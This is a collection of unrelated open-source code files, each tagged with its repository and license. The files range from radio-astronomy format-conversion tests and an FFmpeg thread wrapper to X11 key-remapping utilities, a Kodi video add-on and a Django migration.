with mark4.open(fl2, 'ws', sample_rate=vheader0.sample_rate,
ntrack=64, bps=2, fanout=4, time=vheader0.time,
system_id=108) as fw:
fw.write(dv)
with open(fl2, 'rb') as fh:
conv_bytes = fh.read()
        assert len(conv_bytes) == len(orig_bytes)
assert orig_bytes == conv_bytes
class TestDADAToVDIF1:
"""Real conversion: DADA to VDIF EDV 1, and back to DADA.
Here, we use a VDIF format with a flexible size so it is easier to fit
the dada file inside the VDIF one.
"""
def get_vdif_header(self, header):
return vdif.VDIFHeader.fromvalues(
edv=1, time=header.time, sample_rate=header.sample_rate,
bps=header.bps, nchan=header['NCHAN'],
complex_data=header.complex_data,
payload_nbytes=header.payload_nbytes // 2,
station=header['TELESCOPE'][:2])
def get_vdif_data(self, dada_data):
return (dada_data + 0.5 + 0.5j) / EIGHT_BIT_1_SIGMA
def get_dada_data(self, vdif_data):
return vdif_data * EIGHT_BIT_1_SIGMA - 0.5 - 0.5j
def test_header(self):
with open(SAMPLE_DADA, 'rb') as fh:
ddh = dada.DADAHeader.fromfile(fh)
# Check that we have enough information to create VDIF EDV 1 header.
header = self.get_vdif_header(ddh)
assert abs(header.time - ddh.time) < 2. * u.ns
assert header.payload_nbytes == ddh.payload_nbytes // 2
def test_payload(self):
with open(SAMPLE_DADA, 'rb') as fh:
fh.seek(4096)
ddp = dada.DADAPayload.fromfile(fh, payload_nbytes=64000,
sample_shape=(2, 1),
complex_data=True, bps=8)
dada_data = ddp.data
# Check that conversion between scalings works.
vdif_data = self.get_vdif_data(dada_data)
assert np.allclose(self.get_dada_data(vdif_data), dada_data)
# Check that we can create correct payloads.
vdif_payload0 = vdif.VDIFPayload.fromdata(vdif_data[:, 0, :], bps=8)
vdif_payload1 = vdif.VDIFPayload.fromdata(vdif_data[:, 1, :], bps=8)
vd0, vd1 = vdif_payload0.data, vdif_payload1.data
assert np.allclose(vd0, vdif_data[:, 0, :])
assert np.allclose(vd1, vdif_data[:, 1, :])
vd = np.zeros((vd0.shape[0], 2, vd0.shape[1]), vd0.dtype)
vd[:, 0] = vd0
vd[:, 1] = vd1
dd_new = self.get_dada_data(vd)
ddp2 = dada.DADAPayload.fromdata(dd_new, bps=8)
assert ddp2 == ddp
def test_stream(self, tmpdir):
with dada.open(SAMPLE_DADA, 'rs') as fr:
ddh = fr.header0
dada_data = fr.read()
offset1 = fr.tell()
stop_time = fr.tell(unit='time')
header = self.get_vdif_header(ddh)
data = self.get_vdif_data(dada_data)
assert abs(header.time - ddh.time) < 2. * u.ns
vdif_file = str(tmpdir.join('converted_dada.vdif'))
with vdif.open(vdif_file, 'ws', header0=header,
nthread=data.shape[1]) as fw:
assert (fw.tell(unit='time') - header.time) < 2. * u.ns
            # Write all data in a single frameset, made of two frames.
fw.write(data)
assert (fw.tell(unit='time') - stop_time) < 2. * u.ns
assert fw.offset == offset1
with vdif.open(vdif_file, 'rs') as fv:
assert abs(fv.header0.time - ddh.time) < 2. * u.ns
dv = fv.read()
assert fv.offset == offset1
assert np.abs(fv.tell(unit='time') - stop_time) < 2.*u.ns
vh = fv.header0
vnthread = fv.sample_shape.nthread
assert np.allclose(dv, data)
# Convert VDIF file back to DADA.
dada_file = str(tmpdir.join('reconverted.dada'))
dv_data = self.get_dada_data(dv)
assert np.allclose(dv_data, dada_data)
with dada.open(dada_file, 'ws', sample_rate=vh.sample_rate,
time=vh.time, npol=vnthread, bps=vh.bps,
payload_nbytes=vh.payload_nbytes*2, nchan=vh.nchan,
telescope=vh.station,
complex_data=vh['complex_data']) as fw:
new_header = fw.header0
fw.write(dv_data)
assert self.get_vdif_header(new_header) == vh
with dada.open(dada_file, 'rs') as fh:
header = fh.header0
new_dada_data = fh.read()
assert header == new_header
assert self.get_vdif_header(header) == vh
assert np.allclose(new_dada_data, dada_data)
| mhvk/baseband | baseband/tests/test_conversion.py | Python | gpl-3.0 | 19,399 | 0 |
#
# acrosby 2013
#
def __call__(nc):
    """Return the global attributes of an open netCDF4 Dataset as a dict."""
    s = {}
    for attr in nc.ncattrs():
        s[attr] = nc.getncattr(attr)
    return s
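# A usage sketch; the netCDF4 package and the file name are assumptions made
# for illustration only.
def _example():
    from netCDF4 import Dataset
    nc = Dataset('data.nc')
    return __call__(nc)  # e.g. {'title': '...', 'history': '...'}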
| acrosby/netcdf4-getncattrs | getncattrs.py | Python | mit | 129 | 0 |
# -*- coding: UTF-8 -*-
"""
Name: generic_task.py
Purpose: Execute a generic task with FFmpeg
Compatibility: Python3 (Unix, Windows)
Author: Gianluca Pernigotto <jeanlucperni@gmail.com>
Copyright: (c) 2018/2022 Gianluca Pernigotto <jeanlucperni@gmail.com>
license: GPL3
Rev: Feb.14.2022
Code checker:
flake8: --ignore F821, W504
pylint: --ignore E0602, E1101
This file is part of Videomass.
Videomass is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
Videomass is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with Videomass. If not, see <http://www.gnu.org/licenses/>.
"""
from threading import Thread
import platform
import subprocess
import wx
from videomass.vdms_utils.utils import Popen
if not platform.system() == 'Windows':
import shlex
class FFmpegGenericTask(Thread):
"""
Run a generic task with FFmpeg as a separate thread.
    This class does not redirect any progress output information for
    debugging; however, you can get the exit status message.
USE:
thread = FFmpegGenericTask(args)
thread.join()
error = thread.status
if error:
print('%s' % error)
return
"""
get = wx.GetApp()
appdata = get.appset
def __init__(self, param):
"""
Attributes defined here:
self.param, a string containing the command parameters
of FFmpeg, excluding the command itself `ffmpeg`
self.status, If the exit status is true (which can be an
exception or error message given by returncode) it must be
handled appropriately, in the other case it is None.
"""
self.param = param
self.status = None
Thread.__init__(self)
self.start()
# ----------------------------------------------------------------#
def run(self):
"""
Get and redirect output errors on p.returncode instance and
OSError exception. Otherwise the getted output is None
"""
cmd = (f'"{FFmpegGenericTask.appdata["ffmpeg_cmd"]}" '
f'{FFmpegGenericTask.appdata["ffmpegloglev"]} '
f'{FFmpegGenericTask.appdata["ffmpeg+params"]} '
f'{self.param}')
if not platform.system() == 'Windows':
cmd = shlex.split(cmd)
try:
with Popen(cmd,
stderr=subprocess.PIPE,
universal_newlines=True,
) as proc:
error = proc.communicate()
if proc.returncode: # ffmpeg error
if error[1]:
self.status = error[1]
else:
self.status = "Unrecognized error"
return
except OSError as err: # command not found
self.status = err
return
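# A usage sketch mirroring the USE block in the class docstring; the FFmpeg
# arguments and file names are hypothetical, and a running wx app is assumed
# since the class reads its settings through wx.GetApp().
def _example_task():
    thread = FFmpegGenericTask('-i input.mkv -frames:v 1 poster.png -y')
    thread.join()
    if thread.status:
        print(f'FFmpeg task failed: {thread.status}')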
| jeanslack/Videomass | videomass/vdms_threads/generic_task.py | Python | gpl-3.0 | 3,294 | 0 |
#!/usr/bin/env python
# coding: utf-8
from .interactiveapp import InteractiveApplication, ENCODING
class InteractiveLoopApplication(InteractiveApplication):
def __init__(self, name, desc, version,
padding, margin, suffix, encoding=ENCODING):
super(InteractiveLoopApplication, self).__init__(
name, desc, version, padding, margin, suffix, encoding)
# loop status
self.STATUS_EXIT = 0
self.STATUS_CONTINUE = 1
def loop(self, func):
def mainloop():
loop_flag = self.STATUS_CONTINUE
while loop_flag == self.STATUS_CONTINUE:
try:
loop_flag = func()
except KeyboardInterrupt:
self.write_error("Terminated.")
self.exit(0)
self.exit(0)
return mainloop
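# A usage sketch; the constructor arguments are placeholders. The wrapped
# function drives the loop by returning STATUS_CONTINUE or STATUS_EXIT.
def _example_loop():
    app = InteractiveLoopApplication('demo', 'a demo app', '1.0',
                                     padding=2, margin=1, suffix='> ')
    state = {'count': 0}
    def step():
        state['count'] += 1
        return app.STATUS_EXIT if state['count'] >= 3 else app.STATUS_CONTINUE
    app.loop(step)()  # runs step() until it returns STATUS_EXIT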
| alice1017/coadlib | coadlib/loopapp.py | Python | mit | 871 | 0 |
# This file is part of the kbremap project.
# Copyright (C) 2014 Nicolas Malarmey
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see http://www.gnu.org/licenses.
# contact: elmamyra@gmail.com
# -*- coding: utf-8 -*-
from Xlib.display import Display
from Xlib import X, error
import Xlib
from collections import namedtuple
from gtk import gdk
import gtk
from subprocess import Popen, PIPE
from threading import Timer
from itertools import groupby
from operator import itemgetter
keyEvent = namedtuple('keyEvent', ['type', 'keycode', 'modMask'])
DEAD_KEYS = (
'grave',
'acute',
'circumflex',
'tilde',
'macron',
'breve',
'abovedot',
'diaeresis',
'ring',
'doubleacute',
'caron',
'cedilla',
'ogonek',
'belowdot',
'hook',
'horn',
'stroke',
'schwa',
'SCHWA',
)
LEVEL_MOD = (0, X.ShiftMask, X.Mod5Mask, X.ShiftMask | X.Mod5Mask, X.ControlMask | X.Mod1Mask)
class KeyTools:
KEY_PRESS = X.KeyPress
KEY_RELEASE = X.KeyRelease
def __init__(self):
self._xdisplay = Display()
self._xroot = self._xdisplay.screen().root
self._clipboard = gtk.clipboard_get()
self._clipPrimay = gtk.clipboard_get("PRIMARY")
self._entryForPaste = 118, X.ShiftMask
self._group = 0
self.loadModifiers()
self._keymap = gdk.keymap_get_default() # @UndefinedVariable
def loadModifiers(self):
self._modifiers = []
self._modifierList = []
for key in self._xdisplay.get_modifier_mapping():
li = [k for k in key if k]
#for altgr key
if 92 in li:
li.append(108)
self._modifierList += li
self._modifiers.append(li)
def filterGroup(self, entries):
if entries:
return [e for e in entries if e[-2] == self._group]
return []
def remapKey(self, keycode, keysyms):
allKeysyms = list(self._xdisplay.get_keyboard_mapping(keycode, 1)[0])
keysyms = keysyms + [0]*(4 - len(keysyms))
allKeysyms[:2] = keysyms[:2]
allKeysyms[4:6] = keysyms[2:]
self._xdisplay.change_keyboard_mapping(keycode, [allKeysyms])
self._xdisplay.sync()
def resetMapping(self):
try:
process = Popen('setxkbmap -print -verbose 7'.split(), stdout=PIPE, stderr=PIPE)
except OSError:
print 'install setxkbmap'
for line in process.stderr:
print 'setxkbmap error: {}'.format(line)
layout = variant = ''
for line in process.stdout:
line = line.rstrip()
if line == '':
break
if line.startswith('layout:'):
layout = line.split()[1]
elif line.startswith('variant:'):
variant = line.split()[1]
break
command = ['setxkbmap']
if layout:
command += ['-layout', layout]
if variant:
command += ['-variant', variant]
        if layout or variant:
try:
process = Popen(command, stdout=PIPE, stderr=PIPE)
except OSError:
print 'install setxkbmap'
for line in process.stderr:
print 'setxkbmap error: {}'.format(line)
def isModifier(self, keycode):
return keycode in self._modifierList
def getModMask(self, keycode):
for i, mods in enumerate(self._modifiers):
if keycode in mods:
return 2**i
return 0
def modifiersKeycodeList(self):
return self._modifierList
def numMask(self):
return X.Mod2Mask
def keycode2char(self, keycode, mods, group=0):
char = ''
name = ''
info = self._keymap.translate_keyboard_state(keycode, mods, group)
if info:
keysym = info[0]
char = gdk.keyval_to_unicode(keysym) # @UndefinedVariable
if char:
char = unichr(char)
name = gdk.keyval_name(keysym) # @UndefinedVariable
return char or '', name or ''
def removeNumLockMask(self, keycode, mod):
if not self.isKeypadKey(keycode) and mod & X.Mod2Mask:
return mod ^ X.Mod2Mask
return mod
def entry2keysym(self, keycode, modMask):
info = self._keymap.translate_keyboard_state(keycode, modMask, self._group)
if info:
return info[0]
return None
def entry2name(self, keycode, modMask):
keysym = self.entry2keysym(keycode, modMask)
if keysym is not None:
return gdk.keyval_name(keysym) # @UndefinedVariable
return None
def keycode2entries(self, keycode):
return self.filterGroup(self._keymap.get_entries_for_keycode(keycode))
def keysym2entry(self, keysym):
if not keysym:
return None
infos = self._keymap.get_entries_for_keyval(keysym) # @UndefinedVariable
if infos:
for info in infos:
keycode, group, level = info
if group == self._group:
if level < len(LEVEL_MOD):
mod = LEVEL_MOD[level]
return keycode, mod
return None
def keysym2deadEntries(self, keysym):
resp = ()
entry = self.keysym2entry(keysym)
if entry:
keycode, mod = entry
resp = ((keycode, mod), )
if not resp:
deadKeys = self.findWithDeadKey(keysym)
if deadKeys:
keyKeysym, deadKeysym = deadKeys
keyKeycodes = self.keysym2entry(keyKeysym)
deadKeycodes = self.keysym2entry(deadKeysym)
if keyKeycodes and deadKeycodes:
keyKeycode, keyMod = keyKeycodes
deadKeycode, deadMod = deadKeycodes
resp = ((deadKeycode, deadMod), (keyKeycode, keyMod))
return resp
def keycode2charsAndNames(self, keycode):
entries = self.keycode2entries(keycode)
chars = []
names = []
for entry in entries:
chars.append(keysym2char(entry[0]))
names.append(keysym2name(entry[0]))
if len(chars) >= 4:
break
while not names[-1]:
chars.pop(-1)
names.pop(-1)
return chars, names
def keycode2keysyms(self, keycode):
entries = self.keycode2entries(keycode)
return [e[0] for e in entries][:4]
def char2entries(self, char):
keysym = gdk.unicode_to_keyval(ord(char)) # @UndefinedVariable
if keysym:
return self.keysym2deadEntries(keysym)
return ()
def findWithDeadKey(self, keysym):
name = gdk.keyval_name(keysym) # @UndefinedVariable
for deadName in DEAD_KEYS:
if name.endswith(deadName):
keyName = name[:-len(deadName)]
deadName = {'ring': 'abovering',
'schwa': 'small_schwa',
'SCHWA': 'capital_schwa'}.get(deadName, deadName)
deadName = 'dead_' + deadName
keyKeysym = gdk.keyval_from_name(keyName) # @UndefinedVariable
deadSym = gdk.keyval_from_name(deadName) # @UndefinedVariable
return keyKeysym, deadSym
return None
def isKeypadKey(self, keycode):
entry = self._keymap.get_entries_for_keycode(keycode)
if entry:
for info in entry:
if info[2] == self._group:
name = gdk.keyval_name(info[0]) # @UndefinedVariable
if name and name.startswith('KP_'):
return True
return False
def grabKey(self, keycode, modMask):
self._xroot.grab_key(keycode, modMask, 0, X.GrabModeAsync, X.GrabModeAsync)
if not self.isKeypadKey(keycode) and not modMask & X.Mod2Mask:
self._xroot.grab_key(keycode, modMask | X.Mod2Mask, 0, X.GrabModeAsync, X.GrabModeAsync)
def ungrabKey(self, keycode, modMask):
self._xroot.ungrab_key(keycode, modMask)
if not self.isKeypadKey(keycode) and not modMask & X.Mod2Mask:
self._xroot.ungrab_key(keycode, modMask | X.Mod2Mask)
def nextKeyEvent(self, typ=KEY_PRESS):
if isinstance(typ, int):
typ = (typ,)
num = self._xdisplay.pending_events()
if num:
for _ in range(num):
event = self._xdisplay.next_event()
if event.type in typ:
return keyEvent(event.type, event.detail, event.state)
self._xdisplay.allow_events(X.AsyncKeyboard, X.CurrentTime)
return None
def slotClipboard(self, clipboard, text, backup):
self.sendEntry(*self._entryForPaste)
t = Timer(0.1, self.restoreClipboard, (backup,))
t.start()
def restoreClipboard(self, backup):
self._clipboard.request_text(lambda a, b, c: None)
if backup:
self._clipboard.set_text(backup or '')
self._clipPrimay.clear()
self._clipboard.store()
def sendText(self, text):
backup = self._clipboard.wait_for_text()
self._clipboard.set_text(text)
self._clipPrimay.set_text(text)
self._clipboard.request_text(self.slotClipboard, backup)
self._clipboard.store()
self._clipPrimay.store()
def sendKeysym(self, keysym):
entries = self.keysym2deadEntries(keysym)
for entry in entries:
self.sendEntry(*entry)
def sendEntry(self, keycode, mod):
self.pressKey(keycode, mod)
self.releaseKey(keycode, mod)
def pressKey(self, keycode, modMask):
window = self._xdisplay.get_input_focus()._data["focus"]
evt = Xlib.protocol.event.KeyPress( # @UndefinedVariable
time = X.CurrentTime,
root = self._xroot,
window = window,
same_screen = 0, child = Xlib.X.NONE,
root_x = 0, root_y = 0, event_x = 0, event_y = 0,
state = modMask,
detail = keycode
)
window.send_event(evt, propagate = True)
def releaseKey(self, keycode, modMask):
window = self._xdisplay.get_input_focus()._data["focus"]
evt = Xlib.protocol.event.KeyRelease( # @UndefinedVariable
time = X.CurrentTime,
root = self._xroot,
window = window,
same_screen = 0, child = Xlib.X.NONE,
root_x = 0, root_y = 0, event_x = 0, event_y = 0,
state = modMask,
detail = keycode
)
window.send_event(evt, propagate = True)
def name2unicode(name):
keysym = gdk.keyval_from_name(name) # @UndefinedVariable
return gdk.keyval_to_unicode(keysym) # @UndefinedVariable
def name2keysym(name):
return gdk.keyval_from_name(name) # @UndefinedVariable
def keysym2name(keysym):
try:
return gdk.keyval_name(keysym) or "" # @UndefinedVariable
except:
return ""
def keysym2char(keysym):
char = gdk.keyval_to_unicode(keysym) # @UndefinedVariable
return unichr(char) if char else ""
def name2Char(name):
char = name2unicode(name)
if char:
char = unichr(char)
return char or ''
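# A usage sketch (requires a running X11 session): resolve a character to its
# keycode/modifier entries, including dead-key sequences, and send it to the
# focused window.
def _example_send_char():
    kt = KeyTools()
    for entry in kt.char2entries(u'a'):
        kt.sendEntry(*entry)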
| elmamyra/kbremap | kbremap_app/keyTools/__init__.py | Python | gpl-3.0 | 12,391 | 0.011137 |
from cx_Freeze import setup, Executable
# Dependencies are automatically detected, but it might need
# fine tuning.
buildOptions = dict(packages = ["pyglet", "polytanks", "codecs", "encodings", "selectors"],
excludes = ["tkinter", "PyQt5", "PIL", "setuptools"]
, include_files="assets")
import sys
base = 'Win32GUI' if sys.platform=='win32' else None
executables = [
Executable('main.py', base=base, targetName = 'cliente.exe')
]
setup(name='polytanks-cliente',
version = '1.0',
description = 'Cliente de Polytanks',
options = dict(build_exe = buildOptions),
executables = executables)
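# Standard cx_Freeze workflow: running `python client_setup.py build` writes
# the frozen executable under build/exe.<platform>-<python-version>/.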
| dotoscat/Polytank-ASIR | client_setup.py | Python | agpl-3.0 | 626 | 0.033546 |
import urllib,re,sys,os
import xbmc,xbmcgui,xbmcaddon,xbmcplugin
from resources.libs import main
#Mash Up - by Mash2k3 2012.
addon_id = 'plugin.video.movie25'
selfAddon = xbmcaddon.Addon(id=addon_id)
art = main.art
def LISTSP(murl):
#urllist=main.OPENURL('http://oneclickwatch.org/category/movies/')+main.OPENURL('http://oneclickwatch.org/category/movies/page/2/')+main.OPENURL('http://oneclickwatch.org/category/movies/page/3/')+main.OPENURL('http://oneclickwatch.org/category/movies/page/4/')+main.OPENURL('http://oneclickwatch.org/category/movies/page/5/')+main.OPENURL('http://oneclickwatch.org/category/movies/page/6/')+main.OPENURL('http://oneclickwatch.org/category/movies/page/7/')+main.OPENURL('http://oneclickwatch.org/category/movies/page/8/')+main.OPENURL('http://oneclickwatch.org/category/movies/page/9/')+main.OPENURL('http://oneclickwatch.org/category/movies/page/10/')
urllist=main.batchOPENURL(('http://oneclickwatch.org/category/movies/','http://oneclickwatch.org/category/movies/page/2/','http://oneclickwatch.org/category/movies/page/3/','http://oneclickwatch.org/category/movies/page/4/','http://oneclickwatch.org/category/movies/page/5/','http://oneclickwatch.org/category/movies/page/6/','http://oneclickwatch.org/category/movies/page/7/','http://oneclickwatch.org/category/movies/page/8/','http://oneclickwatch.org/category/movies/page/9/','http://oneclickwatch.org/category/movies/page/10/'))
if urllist:
urllist=main.unescapes(urllist)
match=re.compile('<a href="([^<]+)" title=".+?".+? src="(.+?)" .+?/><br />(.+?)<br />').findall(urllist)
dialogWait = xbmcgui.DialogProgress()
ret = dialogWait.create('Please wait until Movie list is cached.')
totalLinks = len(match)
loadedLinks = 0
remaining_display = 'Movies loaded :: [B]'+str(loadedLinks)+' / '+str(totalLinks)+'[/B].'
dialogWait.update(0,'[B]Will load instantly from now on[/B]',remaining_display)
for url,thumb,name in match:
name=name.replace('<strong>','').replace('</strong>','')
main.addPlayM(name,url,135,thumb,'','','','','')
loadedLinks = loadedLinks + 1
percent = (loadedLinks * 100)/totalLinks
remaining_display = 'Movies loaded :: [B]'+str(loadedLinks)+' / '+str(totalLinks)+'[/B].'
dialogWait.update(percent,'[B]Will load instantly from now on[/B]',remaining_display)
if (dialogWait.iscanceled()):
return False
dialogWait.close()
del dialogWait
main.CloseAllDialogs()
main.GA("HD","Oneclickwatch")
def LISTTV3(murl):
#urllist=main.OPENURL('http://oneclickwatch.org/category/tv-shows/')+main.OPENURL('http://oneclickwatch.org/category/tv-shows/page/2/')+main.OPENURL('http://oneclickwatch.org/category/tv-shows/page/3/')+main.OPENURL('http://oneclickwatch.org/category/tv-shows/page/4/')+main.OPENURL('http://oneclickwatch.org/category/tv-shows/page/5/')
urllist=main.batchOPENURL(('http://oneclickwatch.org/category/tv-shows/','http://oneclickwatch.org/category/tv-shows/page/2/','http://oneclickwatch.org/category/tv-shows/page/3/','http://oneclickwatch.org/category/tv-shows/page/4/','http://oneclickwatch.org/category/tv-shows/page/5/'))
if urllist:
urllist=main.unescapes(urllist)
match=re.compile('title=".+?">([^<]+)</a></h2>.+?href=".+?<a href="(.+?)" .+?href=".+?>.+?src="(.+?)"').findall(urllist)
dialogWait = xbmcgui.DialogProgress()
ret = dialogWait.create('Please wait until Show list is cached.')
totalLinks = len(match)
loadedLinks = 0
remaining_display = 'Episodes loaded :: [B]'+str(loadedLinks)+' / '+str(totalLinks)+'[/B].'
dialogWait.update(0,'[B]Will load instantly from now on[/B]',remaining_display)
for name,url,thumb in match:
name=name.replace('\xc2\xa0','').replace('" ','').replace(' "','').replace('"','').replace("'","'").replace("&","and").replace("’","'").replace("amp;","and").replace("#8211;","-")
main.addPlayTE(name,url,134,thumb,'','','','','')
loadedLinks = loadedLinks + 1
percent = (loadedLinks * 100)/totalLinks
remaining_display = 'Episodes loaded :: [B]'+str(loadedLinks)+' / '+str(totalLinks)+'[/B].'
dialogWait.update(percent,'[B]Will load instantly from now on[/B]',remaining_display)
if (dialogWait.iscanceled()):
return False
dialogWait.close()
del dialogWait
main.GA("TV","Oneclickwatch")
def PLAYOCW(mname,murl):
sources=[]
main.GA("OneclickwatchT","Watched")
ok=True
playlist = xbmc.PlayList(xbmc.PLAYLIST_VIDEO)
playlist.clear()
xbmc.executebuiltin("XBMC.Notification(Please Wait!,Collecting Hosts,5000)")
link=main.OPENURL(murl)
link=link.replace('\r','').replace('\n','').replace('\t','').replace(' ','')
match=re.compile('<p><a href=".+?" rel=".+?">(.+?)</a></p>').findall(link)
desc=re.compile('<.+? />Plot:(.+?)<.+? />').findall(link)
if len(desc)>0:
descs=desc[0]
else:
descs=''
thumb=re.compile('<img alt="" src="(.+?)"').findall(link)
if len(thumb)>0:
thumbs=thumb[0]
else:
thumbs=''
main.CloseAllDialogs()
import urlresolver
for url in match:
host=re.compile("http://(.+?).com/.+?").findall(url)
for hname in host:
host=hname.replace('www.','')
hosted_media = urlresolver.HostedMediaFile(url=url, title=host)
sources.append(hosted_media)
if (len(sources)==0):
xbmc.executebuiltin("XBMC.Notification(Sorry!,Show doesn't have playable links,5000)")
else:
source = urlresolver.choose_source(sources)
try:
if source:
xbmc.executebuiltin("XBMC.Notification(Please Wait!,Resolving Link,3000)")
stream_url = main.resolve_url(source.get_url())
else:
stream_url = False
return
infoLabels =main.GETMETAEpiT(mname,thumbs,descs)
video_type='episode'
season=infoLabels['season']
episode=infoLabels['episode']
img=infoLabels['cover_url']
fanart =infoLabels['backdrop_url']
imdb_id=infoLabels['imdb_id']
infolabels = { 'supports_meta' : 'true', 'video_type':video_type, 'name':str(infoLabels['title']), 'imdb_id':str(infoLabels['imdb_id']), 'season':str(season), 'episode':str(episode), 'year':str(infoLabels['year']) }
infoL={'Title': infoLabels['title'], 'Plot': infoLabels['plot'], 'Genre': infoLabels['genre']}
            # play with bookmark
            from resources.universal import playbackengine
            player = playbackengine.PlayWithoutQueueSupport(resolved_url=stream_url, addon_id=addon_id, video_type=video_type, title=str(infoLabels['title']),season=str(season), episode=str(episode), year=str(infoLabels['year']),img=img,infolabels=infoL, watchedCallbackwithParams=main.WatchedCallbackwithParams,imdb_id=imdb_id)
            #WatchHistory
            if selfAddon.getSetting("whistory") == "true":
                from resources.universal import watchhistory
                wh = watchhistory.WatchHistory('plugin.video.movie25')
                wh.add_item(mname+' '+'[COLOR green]Oneclickwatch[/COLOR]', sys.argv[0]+sys.argv[2], infolabels=infolabels, img=img, fanart=fanart, is_folder=False)
player.KeepAlive()
return ok
except:
return ok
def VIDEOLINKST3(mname,murl):
sources=[]
main.GA("OneclickwatchM","Watched")
ok=True
playlist = xbmc.PlayList(xbmc.PLAYLIST_VIDEO)
playlist.clear()
xbmc.executebuiltin("XBMC.Notification(Please Wait!,Collecting Hosts,5000)")
link=main.OPENURL(murl)
link=link.replace('\r','').replace('\n','').replace('\t','').replace(' ','')
match=re.compile('<p><a href="([^"]+?)".*?>().+?</a></p>').findall(link)
if len(match)==0:
match=re.compile('<a href="(.+?)">(.+?)</a><br />').findall(link)
desc=re.compile('<.+? />Plot:(.+?)<.+? />').findall(link)
if len(desc)>0:
descs=desc[0]
else:
descs=''
thumb=re.compile('<img alt="" src="(.+?)"').findall(link)
if len(thumb)>0:
thumbs=thumb[0]
else:
thumbs=''
main.CloseAllDialogs()
import urlresolver
for url,host in match:
print url
hosted_media = urlresolver.HostedMediaFile(url=url, title=host)
sources.append(hosted_media)
if (len(sources)==0):
xbmc.executebuiltin("XBMC.Notification(Sorry!,Show doesn't have playable links,5000)")
else:
source = urlresolver.choose_source(sources)
try:
if source:
xbmc.executebuiltin("XBMC.Notification(Please Wait!,Resolving Link,3000)")
stream_url = main.resolve_url(source.get_url())
else:
stream_url = False
return
print stream_url
infoLabels =main.GETMETAT(mname,'','',thumbs)
video_type='movie'
season=''
episode=''
img=infoLabels['cover_url']
fanart =infoLabels['backdrop_url']
imdb_id=infoLabels['imdb_id']
infolabels = { 'supports_meta' : 'true', 'video_type':video_type, 'name':str(infoLabels['title']), 'imdb_id':str(infoLabels['imdb_id']), 'season':str(season), 'episode':str(episode), 'year':str(infoLabels['year']) }
infoL={'Title': infoLabels['title'], 'Plot': infoLabels['plot'], 'Genre': infoLabels['genre']}
# play with bookmark
from resources.universal import playbackengine
player = playbackengine.PlayWithoutQueueSupport(resolved_url=stream_url, addon_id=addon_id, video_type=video_type, title=str(infoLabels['title']),season=str(season), episode=str(episode), year=str(infoLabels['year']),img=img,infolabels=infoL, watchedCallbackwithParams=main.WatchedCallbackwithParams,imdb_id=imdb_id)
#WatchHistory
if selfAddon.getSetting("whistory") == "true":
from resources.universal import watchhistory
wh = watchhistory.WatchHistory('plugin.video.movie25')
wh.add_item(mname+' '+'[COLOR green]Oneclickwatch[/COLOR]', sys.argv[0]+sys.argv[2], infolabels='', img=img, fanart='', is_folder=False)
player.KeepAlive()
return ok
except Exception, e:
if stream_url != False:
main.ErrorReport(e)
return ok
| marduk191/plugin.video.movie25 | resources/libs/movies_tv/oneclickwatch.py | Python | gpl-3.0 | 11,474 | 0.022486 |
import sys
def addAbilities(core, actor, player):
if actor.getLevel() >= 10:
actor.addAbility("sp_cloaked_recovery_0")
if actor.getLevel() >= 28:
actor.addAbility("sp_cloaked_recovery_1")
if actor.getLevel() >= 54:
actor.addAbility("sp_cloaked_recovery_2")
if actor.getLevel() >= 70:
actor.addAbility("sp_cloaked_recovery_3")
if actor.getLevel() >= 86:
actor.addAbility("sp_cloaked_recovery_4")
return
# Removes every rank of sp_cloaked_recovery (used when the expertise
# is taken away from the actor).
def removeAbilities(core, actor, player):
actor.removeAbility("sp_cloaked_recovery_0")
actor.removeAbility("sp_cloaked_recovery_1")
actor.removeAbility("sp_cloaked_recovery_2")
actor.removeAbility("sp_cloaked_recovery_3")
actor.removeAbility("sp_cloaked_recovery_4")
return
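# Illustrative (hypothetical) usage by the core scripting engine -- the
# engine is assumed to call these hooks when the expertise is granted,
# on level-up, and when it is removed:
#   addAbilities(core, actor, player)     # grants every rank <= level
#   removeAbilities(core, actor, player)  # strips all granted ranks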
|
agry/NGECore2
|
scripts/expertise/expertise_sp_cloaked_recovery_1.py
|
Python
|
lgpl-3.0
| 700 | 0.027143 |
# -*- coding: utf-8 -*-
# Generated by Django 1.11.5 on 2017-10-01 13:05
from __future__ import unicode_literals
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('contenttypes', '0002_remove_content_type_name'),
('forum', '0004_activity_brick_name'),
]
operations = [
migrations.AddField(
model_name='activity',
name='target_id',
field=models.PositiveSmallIntegerField(default=0, null=True),
),
migrations.AddField(
model_name='activity',
name='target_type',
field=models.ForeignKey(null=True, on_delete=django.db.models.deletion.CASCADE, to='contenttypes.ContentType'),
),
]
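    # Note (assumption, not part of the generated migration): target_type
    # (a ContentType FK) plus target_id is the standard building block for
    # a Django generic relation; a hypothetical accessor on the Activity
    # model could be:
    #   from django.contrib.contenttypes.fields import GenericForeignKey
    #   target = GenericForeignKey('target_type', 'target_id')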
|
igemsoftware2017/USTC-Software-2017
|
biohub/forum/migrations/0005_auto_20171001_2105.py
|
Python
|
gpl-3.0
| 799 | 0.001252 |
# Copyright (c) 2012 Rackspace Hosting
# All Rights Reserved.
# Copyright 2010 United States Government as represented by the
# Administrator of the National Aeronautics and Space Administration.
# All Rights Reserved.
# Copyright 2013 Red Hat, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
Cell messaging module.
This module defines the different message types that are passed between
cells and the methods that they can call when the target cell has been
reached.
The interface into this module is the MessageRunner class.
"""
import sys
import traceback
from eventlet import queue
from oslo.config import cfg
from oslo import messaging
import six
from nova.cells import state as cells_state
